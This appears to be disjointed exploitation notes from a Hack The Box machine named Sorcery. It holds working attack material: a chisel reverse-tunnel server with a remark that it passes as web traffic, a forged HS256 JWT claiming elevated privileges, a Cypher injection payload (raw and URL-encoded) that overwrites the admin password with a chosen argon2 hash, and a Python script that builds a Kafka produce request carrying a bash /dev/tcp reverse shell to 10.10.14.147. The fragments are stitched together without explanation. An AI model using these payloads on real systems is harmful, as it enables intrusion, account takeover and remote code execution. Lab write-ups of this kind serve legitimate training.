Sorcery
# chisel in server mode on TCP 8000: --reverse allows connecting clients to
# request reverse port forwards, --socks5 lets them use chisel's built-in
# SOCKS5 proxy. The tunnel is carried over an HTTP/WebSocket connection, so on
# the monitored side it shows up as one long-lived outbound web session.
chisel server --port 8000 --reverse --socks5
   └─$ echo -n "P@ssw0rd123" | argon2 somesalt -id -t 2 -m 15 -p 1
   Type:             Argon2id
   Iterations:       2
   Memory:           32768 KiB
   Parallelism:      1
   Hash:             4f09ef2131dea271795bb3ff1901f4b0bafeca7b561b82de21991deec345c701
   Encoded:          $argon2id$v=19$m=32768,t=2,p=1$c29tZXNhbHQ$TwnvITHeonF5W7P/GQH0sLr+yntWG4LeIZkd7sNFxwE
   0.215 seconds
   Verification ok
   import jwt
   import time
   # HS256 is symmetric: the same value signs and verifies, so anyone who
   # learns or guesses it can issue tokens carrying whatever claims they like.
   # A short, dictionary-style key gives the signature no real strength.
   signing_key = "mysecretkey"

   # Expiry is one hour after the script runs.
   expires_at = int(time.time()) + 3600

   # Every claim below is chosen by whoever builds the token; a verifier that
   # only checks the signature accepts privilegeLevel / withPasskey /
   # onlyForPaths at face value.
   claims = {
       "id": "13964762-e847-4351-9419-0cd43d57ef40",
       "username": "eqnx",
       "privilegeLevel": 2,
       "withPasskey": False,
       "onlyForPaths": None,
       "exp": expires_at,
   }

   token = jwt.encode(claims, signing_key, algorithm="HS256")
   print(token)
   {"keys":[{"alg":"RS256","e":"AQAB","kid":"mVZr-LKwH47bS_z5ecsImD-
   juQyGAUe2gZd8lfmm15s","kty":"RSA","n":"ya32OuZSjWgNIBldxvH28APu_ZQkEw8-oAWwIEFI-LopkDll3b-
   anY0ZROJutYVZpFowPU7D6Sq4q2fJDMyPLGdOe6Tc8wEewpnRYfIesPXLeVhV5e5ucDX4kwpImiAvdGPxgFc_P7prnVZj1FhvHHsDHsdnSGyCNd
   l3jsHERol_eCHLYBRg2_pp7mSoxAjFuSdwjPlBTcdrNB0mcgRw9XsXbYziGQkIgWpHROCm-
   43CiEwk89jju8JNleaEdEXOvi6ias6dXYhbTsAMpiQdMbQ4Ns5jFKegsxAuIAQ_U1PzWswR8x3zVc6kV1LksCzt0M--
   pLP05Jbo86GEO7Cvz1HjMIXOW70HCOewXI-
   DmHHSfSuKYREFlBi73_RdXIeKvAsmb7ERmCtBmkFf9D2vZdD7T1a5ssuxyI89VaqqwivR_o0a75ne7kbtUdJSoBTm7ZyAqTOyyB3rxbV1hE-
   5tLIxiqnHLidVljZiU68dSFIaAW0NvGPa7HFL-ghN3jrseYaqsCgwEqltv9JB-yy0FcM-
   Sv5fwZ_tfCVIxGs7D_DArCsxg6KIItviUDOkTTOEpSeCEfqhp9C2giGgcz4UONbDTRB7BdpP49NH6vp5J2aJwA7zhHX9btTqqebp7GKKUEanTdU
   lZmaj5MlrneRv6CJpYXrHz0nPHn3UiCj_4Vc","use":"sig"}]}
   # Argon2id (-id), 2 iterations (-t 2), 2^15 KiB = 32768 KiB memory (-m 15),
   # parallelism 1 (-p 1), salt "somesalt"; these parameters are embedded in
   # the encoded string, which is what a verifier reads them back from.
   echo -n "P@ssw0rd123" | argon2 somesalt -id -t 2 -m 15 -p 1
"}) WITH result MATCH (u:User {username: 'admin'}) SET u.password =
'$argon2id$v=19$m=32768,t=2,p=1$c29tZXNhbHQ$TwnvITHeonF5W7P/GQH0sLr+yntWG4LeIZkd7sNFxwE' RETURN result { .*,
description: 'admin password updated' } //
https://sorcery.htb/dashboard/store/88b6b6c5-a614-486c-9d51-d255f47efb4f
~]
└─$ python3 try1.py
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjEzOTY0NzYyLWU4NDctNDM1MS05NDE5LTBjZDQzZDU3ZWY0MCIsInVzZXJuYW1lIj
oiZXFueCIsInByaXZpbGVnZUxldmVsIjoyLCJ3aXRoUGFzc2tleSI6ZmFsc2UsIm9ubHlGb3JQYXRocyI6bnVsbCwiZXhwIjoxNzUwMzY1Nzgwf
Q.k0DaHIhGVjSb0-f9m-zI8b8x-hwNb1HxrevnKTvkLmU
%22%7D%29%20WITH%20result%20MATCH%20%28u%3AUser%20%7Busername%3A%20%27admin%27%7D%29%20SET%20u.password%20%3D%2
0%27%24argon2id%24v%3D19%24m%3D32768%2Ct%3D2%2Cp%3D1%24c29tZXNhbHQ%24TwnvITHeonF5W7P%2FGQH0sLr%2ByntWG4LeIZkd7s
NFxwE%27%20RETURN%20result%20%7B%20.%2A%2C%20description%3A%20%27admin%20password%20updated%27%20%7D%20%2F%2F
import struct, zlib, binascii
# Name of the topic the record is addressed to.
topic = b"update"
# Record payload: a shell command line that opens an interactive shell over TCP.
# NOTE(review): this only has an effect if whatever consumes the topic passes
# message contents to a shell; the consumer is not shown on this page. Message
# bodies are untrusted data and should never be executed by the consumer.
value = b"bash -c 'sh -i >& /dev/tcp/10.10.14.147/4444 0>&1'"
def msg(v):
    """Wrap the bytes *v* in a CRC-prefixed message frame.

    Layout (big-endian): 4-byte unsigned CRC32, 1-byte 0, 1-byte 0,
    4-byte signed -1, 4-byte signed length of *v*, then *v* itself.
    The CRC covers everything after the CRC field.

    NOTE(review): this matches the Kafka v0 message layout (magic,
    attributes, null key, value); the page does not name the protocol.
    """
    # ">" means standard sizes with no padding, so one format string packs
    # the two single bytes and both 32-bit integers back to back.
    prefix = struct.pack(">BBii", 0, 0, -1, len(v))
    framed = prefix + v
    # Mask keeps the checksum in the unsigned 32-bit range before encoding.
    checksum = zlib.crc32(framed) & 0xffffffff
    return checksum.to_bytes(4, "big") + framed
# NOTE(review): the nesting below matches a Kafka Produce v0 request
# (header, acks/timeout, one topic, one partition, one message); the page
# does not name the protocol, so confirm the field meanings.
# The request contains no credentials: a listener that accepts it without
# client authentication or topic ACLs lets any reachable peer write to the topic.

# Message set with a single entry: 8-byte 0, 4-byte message size, message bytes.
record = msg(value)
message_set = struct.pack(">qi", 0, len(record)) + record

# 4-byte 0 (presumably the partition id), then the length-prefixed message set.
partition_data = struct.pack(">ii", 0, len(message_set)) + message_set

# Length-prefixed topic name, a count of one, then the partition entry.
topic_data = b"".join(
    (
        struct.pack(">h", len(topic)),
        topic,
        struct.pack(">i", 1),
        partition_data,
    )
)

# int16 1, int32 10000, int32 1 (presumably acks, timeout in ms, topic count).
request_body = struct.pack(">hii", 1, 10000, 1) + topic_data

# int16 0, int16 0, int32 42, then a length-prefixed 3-byte identifier.
client_id = b"dbg"
request_header = struct.pack(">hhih", 0, 0, 42, len(client_id)) + client_id

# The whole request is prefixed with its own length as a 4-byte integer.
frame = (
    struct.pack(">i", len(request_header) + len(request_body))
    + request_header
    + request_body
)
print(frame.hex())